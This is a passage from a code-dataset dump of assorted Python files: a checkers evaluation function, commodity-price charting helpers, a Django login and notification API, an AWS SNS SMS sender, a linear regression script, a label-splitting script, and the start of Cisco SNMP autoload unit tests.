"line_number": 329, "usage_type": "call"}, {"api_name": "xmlrpc.client.client", "line_number": 329, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 329, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 337, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 337, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 380, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 403, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 421, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 433, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 472, "usage_type": "call"}, {"api_name": "threading.Thread", 
"line_number": 479, "usage_type": "call"}, {"api_name": "config.mntrHostName", "line_number": 601, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 604, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 605, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 612, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 615, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 616, "usage_type": "attribute"}, {"api_name": "config.agntHostName.split", "line_number": 626, "usage_type": "call"}, {"api_name": "config.agntHostName", "line_number": 626, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 659, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 686, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 693, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 699, "usage_type": "call"}]} +{"seq_id": "366709850", "text": "\"\"\"\nA checkers agent implementation based on Arthur Samuel's historic program.\n\"\"\"\nfrom utils import (\n INF, adv, cent, cntr, deny, kcent, mob, mov, thret, back, piece_score_diff,\n position_score, Player,\n)\n\n\nclass ArthurPlayer(Player):\n\n def evaluate(self, board_old, board_new):\n if board_old.is_over():\n return -INF\n if board_new.is_over():\n return INF\n\n _adv = adv(board_new) - adv(board_old)\n _back = adv(board_new) - back(board_old)\n _cent = cent(board_new) - cent(board_old)\n _cntr = cntr(board_new) - cntr(board_old)\n _deny = deny(board_new) - deny(board_old)\n _kcent = kcent(board_new) - kcent(board_old)\n _mob = mob(board_new) - mob(board_old)\n _mobil = _mob - _deny\n _mov = mov(board_new) - mov(board_old)\n _thret = thret(board_new) - thret(board_old)\n\n undenied_mobility = 1 if _mobil > 0 else 0\n total_mobility = 1 if _mob > 0 else 0\n denial_of_occ = 1 if _deny > 0 else 0\n control = 1 if _cent > 0 else 0\n\n _demmo = 1 if denial_of_occ and not total_mobility else 0\n _mode_2 = 1 if undenied_mobility and not denial_of_occ else 0\n _mode_3 = 1 if not undenied_mobility and denial_of_occ else 0\n _moc_2 = 1 if not undenied_mobility and control else 0\n _moc_3 = 1 if undenied_mobility and not control else 0\n _moc_4 = 1 if not undenied_mobility and not control else 0\n\n return sum([\n _moc_2 * (-1) * (2**18),\n _kcent * (2**16),\n _moc_4 * (-1) * (2**14),\n _mode_3 * (-1) * (2**13),\n _demmo * (-1) * (2**11),\n _mov * (2 ** 8),\n _adv * (-1) * (2**8),\n _mode_2 * (-1) * (2**8),\n _back * (-1) * (2**6),\n _cntr * (2**5),\n _thret * (2**5),\n _moc_3 * (2**4),\n piece_score_diff(board_new, board_old.active) * (2**20),\n position_score(board_new, board_old.active) * (2**14),\n ])\n", "sub_path": "agents/arthur.py", "file_name": "arthur.py", "file_ext": "py", "file_size_in_byte": 2031, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.Player", "line_number": 10, "usage_type": "name"}, {"api_name": "utils.INF", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.INF", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.adv", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.adv", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.back", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.cent", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.cntr", "line_number": 21, "usage_type": "call"}, 
{"api_name": "utils.deny", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.kcent", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.mob", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.mov", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.thret", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.piece_score_diff", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.position_score", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "436729785", "text": "import pandas as pd\nimport plotly.offline as plt\nimport plotly.graph_objs as go\nimport numpy as np\nimport os\n\n\ndef nearest(date_range, date):\n date_difference = np.abs(date_range - date)\n return date_difference == min(date_difference)\n\n\ndef state_commodity_time_analysis(dataset, state, commodity, default_request, date_range):\n data = dataset[dataset['Reported Date'].isin(date_range)]\n data = data[(data['State Name'] == state) & (data['Commodity'] == commodity)]\n data = data.sort_values(by='Reported Date')\n if data.empty:\n return False\n # data = data[data['Min Price (Rs./Quintal)'] != 0]\n color = ['#1B5E20', '#006064', '#D50000']\n title = 'Arrivals Range (Tonnes)'\n if str(default_request).strip(\"['']\") != 'Arrivals (Tonnes)':\n title = 'Price Range (Rs. per Quintal)'\n data = data.groupby('Reported Date', as_index=False).agg(np.mean)\n else:\n data = data.groupby('Reported Date', as_index=False).agg(np.sum)\n time_series = [\n go.Scatter(\n x=data['Reported Date'],\n y=data[default_request[i]],\n line=dict(color=color[i]),\n name=default_request[i]\n )\n for i in range(len(default_request))\n ]\n time_series_layout = go.Layout(\n title='Time Series chart of ' + commodity + ' in ' + state + ' State from ' + str(date_range[0])[:10] + ' to ' +\n str(date_range[-1])[:10],\n xaxis=dict(title='Time line',\n rangeslider=dict(visible=True),\n type='date'),\n yaxis=dict(title=title)\n )\n time_series_figure = go.Figure(data=time_series, layout=time_series_layout)\n if os.path.exists('../outputs/state_commodity_time_analysis.html'):\n os.remove('../outputs/state_commodity_time_analysis.html')\n plt.plot(time_series_figure, filename='../outputs/state_commodity_time_analysis.html')\n return True\n\n\ndef maxmin_of_commodity(dataset, commodity, price_degree, state, default_request, number):\n group_param1 = dataset['Commodity'] == commodity\n df = dataset[group_param1]\n if state != 'India':\n group_param2 = df['State Name'] == state\n df = df[group_param2]\n if df.empty:\n return 'No such records found'\n if default_request != 'Arrivals (Tonnes)':\n df = df.groupby('Market Name', as_index=False).agg(np.mean)\n else:\n df = df.groupby('Market Name', as_index=False).agg(np.sum)\n if price_degree == 'Max':\n df = df.sort_values(by=default_request, ascending=False)\n else:\n df = df.sort_values(by=default_request, ascending=True)\n if number > len(df) or number <= 0:\n number = len(df)\n if price_degree == 'Max':\n df = df.sort_values(by=default_request, ascending=False).head(number)\n else:\n df = df.sort_values(by=default_request, ascending=True).head(number)\n if number > 1:\n message = 'Top ' + str(number) + ' ' + default_request + ' for ' + commodity + ' are: \\n' + default_request + \\\n ' | Market Name\\n'\n speech = ''\n for i in range(number):\n speech += str(round(df[default_request].values[i], 2)) + ' | ' + \\\n str(df[df[default_request] == df[default_request].values[i]]['Market Name'].unique()).strip('[]') \\\n + '\\n'\n return message + 
speech\n speech = \"Commodity: \" + commodity + \" has observed \" + default_request + \" of \" + \\\n str(round(df[default_request].values[0], 2)).strip('[]') + \" in \" \\\n + str(df[df[default_request] == df[default_request].values[0]]['Market Name'].unique()).strip('[]') + \\\n \" market(s) of \" + state\n return speech\n\n\ndef datewise_commodity_info(dataset, commodity, state, district, default_request, date):\n val = dataset.loc[\n (dataset['Commodity'] == commodity) & (dataset['State Name'] == state) &\n (dataset['District Name'] == district)]\n if val.empty:\n print('No such data recorded. Please ascertain the veracity of information provided.')\n return 'No such data recorded. Please ascertain the veracity of information provided.'\n else:\n ret_val = val[val['Reported Date'] == date]\n if ret_val.empty:\n position = nearest(val['Reported Date'], date)\n val = val.loc[position]['Reported Date'].unique()\n speech = ''\n for i in range(len(val)):\n speech += str(val[i])[:10] + '\\n'\n return 'No such information found on ' + str(date)[:10] + '. Nearest dates for the requested information' \\\n ' are: \\n' + speech\n else:\n if default_request == 'Arrivals (Tonnes)':\n output = round(ret_val[default_request].sum(), 2)\n return_val = 'Total arrival of ' + commodity + ' on ' + str(date)[:10] + ' is ' + str(output)\n else:\n output = round(ret_val[default_request].mean(), 2)\n return_val = 'Average of ' + default_request + ' of ' + commodity + ' on ' + str(date)[:10] \\\n + ' is ' + str(output)\n return return_val + '\\nMarket Name, Variety, ' + default_request + '\\n' + \\\n str(ret_val[['Market Name', 'Variety', default_request]].values)\n\n\ndef states_price_comparison(dataset, state_list, default_request, commodity, date_range):\n df = dataset[dataset['Reported Date'].isin(date_range)]\n df = df[df['State Name'].isin(state_list)]\n df = df[df['Commodity'] == commodity]\n if df.empty:\n return False\n df = df[df[default_request] != 0]\n df = df.groupby(['State Name', 'Reported Date'], as_index=False).agg(np.mean)\n df = df.sort_values(by='Reported Date')\n color_list = ['#9E9D24', '#3E2723', '#76FF03', '#5E35B1', '#1DE9B6']\n time_series_comparison = [\n go.Scatter(\n x=df['Reported Date'],\n y=(df[df['State Name'] == state_list[i]])[default_request],\n line=dict(color=color_list[i % 10]),\n name=state_list[i]\n )\n for i in range(len(state_list))\n ]\n\n time_series_comparison_layout = go.Layout(\n title='Time Series chart of states comparison in average ' + default_request + ' of ' + commodity,\n xaxis=dict(title='Time line',\n rangeslider=dict(visible=True),\n type='date'),\n yaxis=dict(title=default_request)\n )\n\n time_series_comparison_figure = go.Figure(data=time_series_comparison, layout=time_series_comparison_layout)\n if os.path.exists('../outputs/states_price_comparison.html'):\n os.remove('../outputs/states_price_comparison.html')\n plt.plot(time_series_comparison_figure, filename='../outputs/states_price_comparison.html')\n return True\n\n\ndef get_n_commodity(df, default_request, price_degree, date, number):\n val = df\n if date != 'None':\n date = date[:10]\n date = pd.to_datetime(date, infer_datetime_format=True)\n val = df.loc[(df['Reported Date'] == date)]\n if val.empty:\n print('No such data recorded. 
Please ascertain the veracity of information provided.')\n position = nearest(df['Reported Date'], date)\n val = df.loc[position]['Reported Date'].unique()\n speech = ''\n for i in range(len(val)):\n speech += str(val[i])[:10] + '\\n'\n return 'No such information found on ' + str(date)[:10] + '. Nearest dates for the requested information' \\\n ' are: \\n' + speech\n else:\n if default_request == 'Arrivals (Tonnes)':\n df = val.groupby('Commodity', as_index=False).agg(np.sum)\n else:\n df = val.groupby('Commodity', as_index=False).agg(np.mean)\n if number > len(df) or number <= 0:\n number = len(df)\n if price_degree == 'Max':\n df = df.sort_values(by=default_request, ascending=False).head(number)\n print(df[[default_request, 'Commodity']])\n else:\n df = df.sort_values(by=default_request, ascending=True).head(number)\n print(df[[default_request, 'Commodity']])\n return str(df['Commodity'].values).strip('[]')\n", "sub_path": "src/webhook_methods.py", "file_name": "webhook_methods.py", "file_ext": "py", "file_size_in_byte": 8284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.abs", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 26, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 28, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 36, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 36, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 44, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 44, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 46, "usage_type": "call"}, {"api_name": "plotly.offline.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 125, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 129, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 129, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 138, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 138, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 146, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 146, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 148, "usage_type": "call"}, {"api_name": "plotly.offline.plot", "line_number": 149, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 149, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "124830171", "text": 
"'''\nCreated on Oct 20, 2014\n\n@author: jbarni00\n'''\n#meetup_day(2013, 5, 'Monday', 'teenth')\nimport datetime\nimport calendar\n\ndef meetup_day(year, month, dayofweek, increment):\n # Get day of week of first of month\n\n\n week = {'Sunday': 0, \n 'Monday' :1, \n 'Tuesday': 2, \n 'Wednesday': 3, \n 'Thursday' : 4, \n 'Friday': 5, \n 'Saturday': 6 }\n \n\n dayone, numberofdays = calendar.monthrange(year, month)\n # Sunday is a special case, normaize to 0-7\n\n if dayone == 6:\n dayone = 0\n else:\n dayone = dayone+1\n\n if dayone <= week[dayofweek]:\n firstdate = 1 + ( week[dayofweek] - dayone)\n else:\n firstdate = 1 + 7 - ( dayone - week[dayofweek])\n\n if increment == 'teenth':\n potentialday = firstdate\n while potentialday < 13:\n potentialday += 7\n return datetime.date(year, month, potentialday)\n\n if increment == 'first' or increment == '1st':\n return datetime.date(year, month, firstdate)\n \n if increment == '2nd':\n return datetime.date(year, month, firstdate +7 )\n \n if increment == '3rd':\n return datetime.date(year, month, firstdate + 14)\n \n if increment == '4th':\n return datetime.date(year, month, firstdate + 21 )\n \n if increment == 'last':\n potentialday = firstdate + 35\n while potentialday > numberofdays:\n potentialday -=7\n return datetime.date(year, month, potentialday)\n \n \n", "sub_path": "all_data/exercism_data/python/meetup/a2d4c77a2b644aea953033a6e3c4efc4.py", "file_name": "a2d4c77a2b644aea953033a6e3c4efc4.py", "file_ext": "py", "file_size_in_byte": 1547, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "calendar.monthrange", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "422445787", "text": "import sys\nimport logging\nfrom time import time\nimport json\n\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import connection\nfrom django.db.models import Count, Min, Sum, Avg\nfrom django.forms.models import model_to_dict\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.utils.timezone import utc\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.http import require_POST\n\nimport functions\nfrom models import Device, Configuration, DeviceConfiguration, Sensor, Notification\nfrom helpers import create_json_response\n\n\nlogger = logging.getLogger('django')\n\n\ndef index(request):\n return redirect('/static/index.html', permanent=True)\n\n\ndef api_index(request):\n return create_json_response({'version': 0.2}, request)\n\n\n@require_POST\n@sensitive_post_parameters('password')\ndef login_user(request):\n if 'username' in request.POST and 'password' in request.POST:\n user = authenticate(username=request.POST[\n 'username'], password=request.POST['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n return create_json_response({\"login\": \"successful\", \"user\": request.user.get_full_name()}, 
request)\n else:\n return create_json_response({\"login\": \"disabled\", \"user\": request.user.get_full_name()}, request)\n else:\n return create_json_response({\"login\": \"invalid\"}, request)\n else:\n return create_json_response({\"login\": \"failed\"}, request)\n\n\ndef logout_user(request):\n logout(request)\n return create_json_response({\"logout\": \"successful\"}, request)\n\n\ndef status(request):\n output = [\n (\"system_status\", functions.get_configuration(\"system_status\", False))]\n output.append(\n (\"system_mode\", functions.get_configuration(\"system_mode\", False)))\n output.append((\"login\", request.user.is_authenticated()))\n\n if request.user.is_authenticated():\n output.append((\"user\", request.user.get_full_name()))\n output.append((\"admin\", request.user.is_superuser))\n output.append(\n (\"auto_optimization\", functions.get_configuration(\"auto_optimization\", False)))\n\n return create_json_response(dict(output), request)\n\n\n@require_POST\ndef export_csv(request):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n response = HttpResponse(content_type='text/csv')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"export_%s.csv\"' % time()\n\n if 'csv' in request.POST:\n response.write(request.POST['csv'])\n\n return response\n\n\ndef list_settings(request):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n output = []\n output += functions.get_configurations()\n output += functions.get_device_configurations()\n return create_json_response(dict(output), request)\n\n\ndef list_sensors(request):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n sensors = Sensor.objects.filter(in_diagram=True).values(\n 'id', 'name', 'unit', 'device__name', 'aggregate_sum', 'aggregate_avg')\n\n # rename device__name to device for convenience\n output = [{'id': x['id'], 'name': x['name'], 'unit': x['unit'], 'device': x['device__name'], 'sum': x['aggregate_sum'], 'avg': x['aggregate_avg']}\n for x in sensors]\n\n return create_json_response(output, request)\n\n\ndef list_notifications(request, start, end):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n start = 0 if start is None else start\n end = 25 if end is None else end\n\n if request.user.is_superuser:\n notifications = Notification.objects.all()\n else:\n notifications = Notification.objects.filter(\n threshold__show_manager=True)\n\n notifications = notifications.select_related()\n\n output = {\n 'total': len(notifications),\n 'notifications': []\n }\n\n for notification in notifications.order_by('-sensor_value__timestamp')[int(start):int(end)]:\n output['notifications'].append({\n 'id': notification.id,\n 'threshold': model_to_dict(notification.threshold),\n 'sensor_value': model_to_dict(notification.sensor_value),\n 'read': notification.read,\n 'target': notification.target,\n })\n\n return create_json_response(output, request)\n", "sub_path": "server/hooks.py", "file_name": "hooks.py", "file_ext": "py", "file_size_in_byte": 4591, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", 
"line_number": 42, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 43, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 45, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 47, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 49, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 34, "usage_type": "name"}, {"api_name": "django.views.decorators.debug.sensitive_post_parameters", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 53, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 54, "usage_type": "call"}, {"api_name": "functions.get_configuration", "line_number": 59, "usage_type": "call"}, {"api_name": "functions.get_configuration", "line_number": 61, "usage_type": "call"}, {"api_name": "functions.get_configuration", "line_number": 68, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 70, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 76, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 73, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 90, "usage_type": "name"}, {"api_name": "functions.get_configurations", "line_number": 93, "usage_type": "call"}, {"api_name": "functions.get_device_configurations", "line_number": 94, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 95, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 100, "usage_type": "name"}, {"api_name": "models.Sensor.objects.filter", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Sensor.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Sensor", "line_number": 102, "usage_type": "name"}, {"api_name": "helpers.create_json_response", "line_number": 109, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 114, "usage_type": "name"}, {"api_name": "models.Notification.objects.all", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Notification.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Notification", "line_number": 120, "usage_type": "name"}, {"api_name": "models.Notification.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Notification.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Notification", "line_number": 122, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 136, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "434700991", "text": "import boto3\n\ndef send_sms(phone, text_body):\n sns = boto3.client('sns')\n response = sns.publish(\n PhoneNumber=phone,\n Message=text_body, \n MessageAttributes={\n \"AWS.SNS.SMS.SMSType\": {\n \"DataType\": \"String\",\n \"StringValue\": \"Transactional\"\n }\n },\n )\n\n # print(\"\\n\", response)\n return response\n\n\n# 
send_sms(\"+13175142678\", \"hello drew\")\n\n", "sub_path": "send_sms.py", "file_name": "send_sms.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "boto3.client", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "548412489", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#collecting x and y value\n\ndata= pd.read_csv('/home/admin1/Downloads/bike_sharing.csv')\n\nY= data['cnt'].values\nX= data['temp'].values\n\nprint(X)\nprint(Y)\n\nmean_x= np.mean(X)\nmean_y=np.mean(Y)\n\n#total no of values\nm= len(X)\n\n#using formula calculate b1 and b0\n\nnumber=0\ndenom=0\n\nfor i in range(m):\n number +=(X[i]-mean_x)*(Y[i]-mean_y)\n denom +=(X[i]-mean_x)**2\n\n b1=number/denom\n b0=mean_y-(b1*mean_x)\n\n #print coefficients\n\nprint(b1,b0)\n\n#plotting values and regresstion line\n\nmax_x= np.max(X)\nmin_x =np.min(X)\n\n#calculating line values x and y\n\nx = np.linspace(min_x,max_x,50)\ny= b0 + b1 * x\n\n\n#Plotting line\n\nplt.plot(x,y , color='red',label='Regresstion Line')\nplt.scatter(X,Y,color='blue',label='Scatter plot')\nplt.xlabel('Temperature')\nplt.ylabel('Count')\nplt.legend()\nplt.show()\n\n", "sub_path": "SlinearDirectory/SlinerProblem2.py", "file_name": "SlinerProblem2.py", "file_ext": "py", "file_size_in_byte": 874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "393208582", "text": "import os\nimport json\nimport random\n\nlabels = '/home/jrola/PycharmProjects/pytorch_CTM/hmdb4_labels.csv'\nnew_labels20 = '/home/jrola/PycharmProjects/pytorch_CTM/hmdb4_labels20.csv'\nnew_labels80 = '/home/jrola/PycharmProjects/pytorch_CTM/hmdb4_labels80.csv'\nclass_name_to_label_path = '/home/jrola/PycharmProjects/pytorch_CTM/class_name_to_label.json'\n\nrandom.seed()\n\nif os.path.isfile(labels) == False:\n print(\"No File\")\n exit()\n\nwith open(class_name_to_label_path, 'r') as json_file:\n x = json.load(json_file)\n\ncount = 0\nlineC = 0\nsuffixCount = 0\nsuffixSum = 0\ncount80 = 0\ncount20 = 0\nnumLabels = 
int(input(\"Number of labels: \"))\n\nfor (k, v) in x.items():\n with open(labels, 'r') as fp:\n lineC = 0\n suffixCount = 0\n for line in fp:\n lineC = lineC + 1\n if line.endswith(\",\" + str(v) + \"\\n\"):\n suffixCount = suffixCount + 1\n if random.random() > 0.80:\n with open(new_labels20, 'a') as fp2:\n fp2.write(line)\n count20 = count20 + 1\n else:\n with open(new_labels80, 'a') as fp3:\n fp3.write(line)\n count80 = count80 + 1\n print(k + \" \" + str(suffixCount))\n count = count + 1\n suffixSum = suffixSum + suffixCount\n if v == (numLabels - 1):\n break\ncountSum = count80 + count20\n#print(suffixCount)\nprint(lineC - 1)\nprint(suffixSum)\nprint(countSum)\n", "sub_path": "anterior/2semana/label_to_test.py", "file_name": "label_to_test.py", "file_ext": "py", "file_size_in_byte": 1486, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 17, "usage_type": "call"}, {"api_name": "random.random", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "283464025", "text": "from unittest import TestCase\nfrom mock import MagicMock, patch\nfrom cloudshell.devices.standards.networking.autoload_structure import GenericChassis, GenericPort\nfrom cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload import CiscoGenericSNMPAutoload\nfrom cloudshell.snmp.quali_snmp import QualiMibTable\n\n\nclass TestsCiscoGenericSNMPAutoload(TestCase):\n def setUp(self):\n self._snmp_handler = MagicMock()\n self._shell_name = \"\"\n self._shell_type = \"CS_switch\"\n self._logger = MagicMock()\n self._resource_name = \"resource\"\n self.cisco_snmp_autoload = CiscoGenericSNMPAutoload(self._snmp_handler,\n self._shell_name,\n self._shell_type,\n self._resource_name,\n self._logger)\n\n def test_load_cisco_mib(self):\n self.cisco_snmp_autoload.load_cisco_mib()\n self._snmp_handler.update_mib_sources.called_once()\n\n def test_is_valid_device_os_success(self):\n mib = \"SNMPv2-MIB\"\n mib_property = \"sysDescr\"\n mib_index = \"0\"\n self._snmp_handler.get_property.return_value = \"valid\"\n self.cisco_snmp_autoload._is_valid_device_os([\".*\"])\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n\n def test_is_valid_device_os_raises(self):\n mib = \"SNMPv2-MIB\"\n mib_property = \"sysDescr\"\n mib_index = \"0\"\n supported_os = [\"1\"]\n self._snmp_handler.get_property.return_value = \"valid\"\n try:\n self.cisco_snmp_autoload._is_valid_device_os(supported_os)\n except Exception as e:\n self.assertIn('Incompatible driver! 
Please use this driver for \\'{0}\\' operation system(s)'.\n format(str(tuple(supported_os))), e.args)\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n\n def test_get_device_model(self):\n model_name = \"cevModelName\"\n mib = 'SNMPv2-MIB'\n mib_property = 'sysObjectID'\n mib_index = '0'\n self._snmp_handler.get_property.return_value = \"Cisco::{0}\".format(model_name)\n result = self.cisco_snmp_autoload._get_device_model()\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n self.assertEqual(model_name, result)\n\n def test_get_device_os_version(self):\n version = \"12.3.S(3).45\"\n mib = 'SNMPv2-MIB'\n mib_property = 'sysDescr'\n mib_index = '0'\n self._snmp_handler.get_property.return_value = \"Version {0} \".format(version)\n result = self.cisco_snmp_autoload._get_device_os_version()\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n self.assertEqual(version, result)\n\n def test_get_device_model_name(self):\n model_name = \"model name\"\n with patch(\n \"cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.get_device_name\") as get_dev_name_mock:\n 